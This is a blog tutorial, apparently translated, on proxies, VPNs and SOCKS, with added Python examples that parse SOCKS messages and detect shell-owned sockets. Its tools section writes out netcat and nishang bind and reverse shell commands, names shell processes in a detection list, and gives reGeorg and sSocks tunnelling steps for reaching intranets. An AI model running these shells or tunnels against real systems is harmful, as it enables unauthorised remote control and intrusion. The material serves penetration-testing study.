Learning about proxy servers

1. Proxy Server and VPN

1. Working principle

(1) How a proxy works:

The proxy server accesses the target website on your behalf, loads its content, and then delivers the loaded content to your browser window, which is equivalent to you browsing the target website yourself. This is why proxies are often called "ladders" or "bridges".

(2) How VPN works:

The data you transmit is encrypted by the VPN client software and sent to the VPN server, so that anyone intercepting the traffic in transit cannot read it (tunneling).
Note: the main difference between the two is that proxies are designed for basic functions, such as bypassing geo-restrictions, but they are not as secure, while a VPN encrypts and protects all of the data. A VPN is different from a proxy, but the two can be used together to enhance anonymity.

2. Proxy server types

(1) HTTP proxy:

It proxies the client's HTTP traffic. An HTTP proxy is what is used when browsing web pages and downloading data through a proxy.

(2) HTTPS proxy:

HTTPS is HTTP over SSL/TLS: a network protocol that encrypts the transmission and is therefore more secure than plain HTTP for transferring files. HTTPS and SSL/TLS support X.509 digital certificates, so the user can confirm who the sender is when needed.

(3) SOCKS proxy:

A proxy server that speaks the SOCKS protocol is a SOCKS server, a general-purpose proxy.
Its standard port is 1080, and it supports multiple protocols, including HTTP, FTP and other kinds of requests. A SOCKS proxy differs from an application-layer proxy such as an HTTP proxy: it simply relays data packets without caring about the application protocol, so it is faster and simpler. If you are on a corporate or campus network and have to reach the Internet through a firewall or proxy server, you may need SOCKS. It comes in two versions, SOCKS4 and SOCKS5. It is a general proxy server that acts as the request agent in network communication. During intranet penetration, building a SOCKS proxy lets you communicate with hosts on the target intranet without setting up port forwarding many times over.
SOCKS4: supports only TCP (Transmission Control Protocol).
SOCKS5: supports both TCP and UDP (User Datagram Protocol).
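As an added example (not code from the original post), here are the SOCKS4 and SOCKS5 messages described above, built and parsed byte by byte in Python following the SOCKS4 protocol description and RFC 1928. It also shows the SOCKS5 method negotiation that SOCKS4 lacks, and goes slightly beyond the text by covering domain-name and IPv6 targets, which only SOCKS5 can express. No network connection is made; the functions and constant names are this example's own.

```python
"""
Added example (not from the original post): SOCKS4 and SOCKS5 handshake
messages encoded and decoded from their byte layouts (SOCKS4 spec, RFC 1928).
No sockets are opened; the point is to see both sides of the exchange and
why SOCKS4 cannot carry UDP or non-IPv4 destinations.
"""
import ipaddress
import struct

SOCKS4, SOCKS5 = 0x04, 0x05
CMD_CONNECT, CMD_BIND, CMD_UDP_ASSOCIATE = 0x01, 0x02, 0x03  # SOCKS4 has only CONNECT/BIND
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
METHOD_NO_AUTH, METHOD_USERPASS, METHOD_NONE_ACCEPTABLE = 0x00, 0x02, 0xFF


def socks4_connect_request(host: str, port: int, user_id: bytes = b"") -> bytes:
    """SOCKS4 request: VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID... NUL.
    Only IPv4 literals and TCP commands exist in SOCKS4."""
    ip = ipaddress.IPv4Address(host)  # raises for IPv6 or a hostname
    return struct.pack("!BBH4s", SOCKS4, CMD_CONNECT, port, ip.packed) + user_id + b"\x00"


def socks5_greeting(methods=(METHOD_NO_AUTH,)) -> bytes:
    """Client greeting: VER NMETHODS METHODS[...]."""
    return bytes([SOCKS5, len(methods), *methods])


def socks5_select_method(greeting: bytes, offered=(METHOD_NO_AUTH,)) -> bytes:
    """Server reply to the greeting: VER METHOD. 0xFF tells the client that
    nothing it offered is acceptable and it must close the connection."""
    if len(greeting) < 2 or greeting[0] != SOCKS5 or len(greeting) != 2 + greeting[1]:
        raise ValueError("malformed SOCKS5 greeting")
    client_methods = greeting[2:]
    chosen = next((m for m in offered if m in client_methods), METHOD_NONE_ACCEPTABLE)
    return bytes([SOCKS5, chosen])


def socks5_request(cmd: int, host: str, port: int) -> bytes:
    """Client request: VER CMD RSV ATYP DST.ADDR DST.PORT. ATYP is picked from
    the host string: a domain name is sent as-is and resolved by the proxy
    (remote DNS), an IP literal is sent packed."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        name = host.encode("idna")
        body = bytes([ATYP_DOMAIN, len(name)]) + name
    else:
        body = bytes([ATYP_IPV4 if addr.version == 4 else ATYP_IPV6]) + addr.packed
    return bytes([SOCKS5, cmd, 0x00]) + body + struct.pack("!H", port)


def parse_socks5_request(data: bytes):
    """Server-side decode of a SOCKS5 request; returns (cmd, host, port).
    Anything that does not parse exactly is rejected rather than guessed."""
    if len(data) < 4 or data[0] != SOCKS5 or data[2] != 0x00:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        end = 4 + 4
        host = str(ipaddress.IPv4Address(data[4:end]))
    elif atyp == ATYP_IPV6:
        end = 4 + 16
        host = str(ipaddress.IPv6Address(data[4:end]))
    elif atyp == ATYP_DOMAIN:
        end = 5 + data[4]
        host = data[5:end].decode("idna")
    else:
        raise ValueError("unknown ATYP %#x" % atyp)
    if len(data) != end + 2:
        raise ValueError("truncated or trailing data")
    (port,) = struct.unpack("!H", data[end:])
    return cmd, host, port


if __name__ == "__main__":
    # Client side of a SOCKS5 CONNECT to example.com:443, then the proxy's view of it.
    print(socks5_greeting().hex(), socks5_select_method(socks5_greeting()).hex())
    req = socks5_request(CMD_CONNECT, "example.com", 443)
    print(req.hex(), parse_socks5_request(req))
    # UDP ASSOCIATE exists only in SOCKS5; SOCKS4 has no way to express it.
    print(parse_socks5_request(socks5_request(CMD_UDP_ASSOCIATE, "0.0.0.0", 0)))
    print(socks4_connect_request("10.0.0.5", 80, b"alice").hex())
```

The server-side parser is strict on purpose: a SOCKS server exposed on port 1080 receives arbitrary bytes, and rejecting anything that is not an exact, well-formed request is the first defensive check such a service should make.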

3. Proxy modes

1. Global proxy:

Most of the computer's network requests go through the proxy tool.

2. Rule-based proxy (PAC):

In this mode a PAC file decides whether each request goes through the proxy or not.

3. Direct proxy:

Set the proxy settings of an individual program so that it connects to the proxy server directly.

4. Tools and commands

First, learn to think about forward and reverse connections with an attacker's mindset.

Forward connection:
[Figure: forward connection diagram (image not available)]

A forward connection is one in which the controlled host (target machine) listens on a port and the controlling host (attack machine) actively connects to it. It is suitable when the controlled host (target machine) has a public IP address. In the figure, both Attacker and Victim have public IP addresses, so Attacker can reach Victim directly by IP and can use a forward connection to control Victim.
Reverse connection:
[Figure: reverse connection diagram (image not available)]

A reverse connection is one in which the controlling host (attack machine) listens on a port and the controlled host (target machine) connects back to it. It suits situations where the controlled host (target machine) has no public IP address. In the figure, Victim is on an intranet with no public IP, so Attacker cannot reach Victim directly by IP; instead, Attacker listens on a port and Victim connects back to Attacker, which is how Attacker controls Victim.
In penetration testing, forward connections are often defeated by firewall rules and by insufficient privileges on the controlled host; reverse connections get around these limitations well.
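The forward/reverse distinction above can be turned into a simple detection rule on the defender's side. The following is an added example, not part of the original post: it scans constructed connection records (a simplified ss-style format assumed for the example) and flags shell or netcat processes that own a listening socket (bind-shell pattern) or an established connection to an external address (reverse-shell pattern). The process list, the record format, the sample lines and the function names are all this example's own assumptions.

```python
"""
Added example (not part of the original post): the forward/reverse
distinction turned into a detection pass over connection records.
The records are constructed in a simplified ss-style format so the example
runs offline; on a real host the same fields come from `ss -tunap`,
`netstat -ano`, or EDR socket events.
"""
import ipaddress
from dataclasses import dataclass

# Processes that should not normally own a network socket on a server.
# This list is an assumption for the example; tune it per environment.
SHELL_PROCESSES = {"sh", "bash", "dash", "zsh", "cmd.exe",
                   "powershell.exe", "pwsh", "nc", "ncat", "netcat"}

# Address ranges treated as "inside". Spelled out instead of using
# ipaddress.is_private so the 203.0.113.0/24 documentation range can stand
# in for a public attacker address in the constructed sample data below.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


@dataclass
class Conn:
    host: str
    proto: str
    state: str
    local: str
    remote: str      # "-" for listening / unconnected sockets
    process: str


def parse_record(line: str) -> Conn:
    """One record: host proto state local remote process (whitespace separated)."""
    return Conn(*line.split())


def is_external(endpoint: str) -> bool:
    """True when the ip:port endpoint lies outside every internal range."""
    ip = endpoint.rsplit(":", 1)[0].strip("[]")
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def classify(conn: Conn):
    """Return a verdict for a suspicious shell-owned socket, else None."""
    if conn.process not in SHELL_PROCESSES:
        return None
    if conn.state == "LISTEN":
        return "bind-shell-listener"           # forward-connection pattern
    if conn.proto == "udp" and conn.state == "UNCONN":
        return "udp-shell-socket"              # UDP bind or reverse shell
    if conn.state == "ESTAB":
        if is_external(conn.remote):
            return "reverse-shell-external"    # reverse-connection pattern
        return "shell-with-internal-peer"      # lateral movement or pivot
    return None


def scan(lines):
    """Return (host, process, verdict, endpoint) per suspicious record; the
    endpoint is the local socket for listeners and the peer otherwise."""
    findings = []
    for line in lines:
        conn = parse_record(line)
        verdict = classify(conn)
        if verdict:
            endpoint = conn.local if conn.remote == "-" else conn.remote
            findings.append((conn.host, conn.process, verdict, endpoint))
    return findings


# Constructed sample telemetry; none of these are real hosts or sessions.
SAMPLE = """
web01 tcp ESTAB 10.0.2.15:443 10.0.2.30:51522 nginx
web01 tcp LISTEN 0.0.0.0:4444 - nc
web01 tcp ESTAB 10.0.2.15:49872 203.0.113.7:4444 bash
ws17 udp UNCONN 0.0.0.0:86 - powershell.exe
ws17 tcp ESTAB 10.0.2.44:51000 10.0.2.10:445 explorer.exe
db01 tcp ESTAB 10.0.2.20:50012 10.0.2.15:22 ssh
""".strip().splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

This is a process-centric heuristic: it keys on which process owns the socket, which is what makes `nc -e /bin/sh` style shells visible regardless of the port used. An administrator using netcat for a file transfer will trigger it too, so treat a hit as a triage lead and confirm with the process tree and command line.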

1. Tool name: Netcat

Introduction:
A stable backdoor tool that other programs and scripts can easily drive directly. It reads and writes data across network connections using TCP or UDP. It is also a powerful network debugging and probing tool that can establish almost any type of network connection you need. The proxy protocols it supports are "4" (SOCKS v.4), "5" (SOCKS v.5) and "connect" (HTTPS proxy); SOCKS v.5 is the default.
Commonly used commands:

(1) Forward connection:

The target machine listens (/bin/sh can be understood as a symbolic link to /bin/bash): nc -lvvp [port] -e /bin/sh
The attack machine connects with nc: nc [ip] [port]

(2) Reverse connection:

The attack machine listens: nc -lvvp [port]
The target machine sends back a shell: nc -t -e c:\winnt\system32\cmd.exe [ip] [port]

2. Tool name: nishang

Introduction:
Nishang is a penetration-testing toolkit for PowerShell. It works only in PowerShell 3.0 or above (use the Get-Host command to check the current PowerShell version). Invoke-PowerShellUdp is an interactive PowerShell bind (forward) or reverse shell based on UDP. Invoke-PoshRatHttp and Invoke-PoshRatHttps are interactive PowerShell reverse shells based on HTTP and HTTPS respectively (not demonstrated).
Common commands:

(1) Forward connection (UDP based, so the nc command needs the -u option):

The target machine listens with nishang: Invoke-PowerShellUdp -Bind -Port 86
The attack machine connects with nc: nc -nvu 192.168.190.159 86
The attack machine then gets the nishang PowerShell prompt.

(2) Reverse connection:

The attack machine listens: nc -lup 86
The target machine sends back a shell: Invoke-PowerShellUdp -Reverse -IPAddress [ip] -Port 86

3. Tool name: reGeorg

Tool address: https://github.com/sensepost/reGeorg
Introduction:
reGeorg is an upgraded version of reDuh. It forwards ports of an internal server to the local machine through an HTTP/HTTPS tunnel, forming a loop, and is used to reach internally open ports of the target server when the target is on an intranet or behind a port policy. It uses a webshell to set up a SOCKS proxy for intranet penetration; the server must support one of the web languages ASPX, PHP or JSP.

4. Tool name: sSocks

Tool address: http://sourceforge.net/projects/ssocks/
Introduction:
sSocks is a SOCKS proxy tool suite. It can start a SOCKS proxy service, supports SOCKS5 authentication, IPv6 and UDP, and provides a reverse SOCKS proxy service, which is the feature used here: the remote computer acts as the SOCKS proxy server and bounces the connection back to the local computer, which greatly simplifies penetration testing of the intranet. The latest version is 0.0.14; download it, unzip it, and compile it with:
./configure && make
Enter the src directory and you will find nsocks, ssocksd, ssocks and rcsocks. Their functions are:
nsocks: like netcat but through a SOCKS5 proxy; can be used to test a SOCKS server.
ssocksd: starts a SOCKS5 proxy service.
ssocks: starts a SOCKS5 service locally and bounces it to another IP address.
rcsocks: receives the bounced SOCKS5 service and redirects it to another port.
Execute on the public host:
./rcsocks -l 4444 -p 5555 -vv
Execute on the intranet host:
./rssocks -vv -s [public host IP]:5555
Now the local host can reach the intranet web host by connecting to port 4444 on the public host.

5. frp

Tool address: https://github.com/fatedier/frp/releases
frp is an open-source, simple, easy-to-use and high-performance intranet penetration and reverse proxy program that supports TCP, UDP, HTTP, HTTPS and other protocols.
frp experiment: frp


Source: blog.csdn.net/qq_53517370/article/details/128929200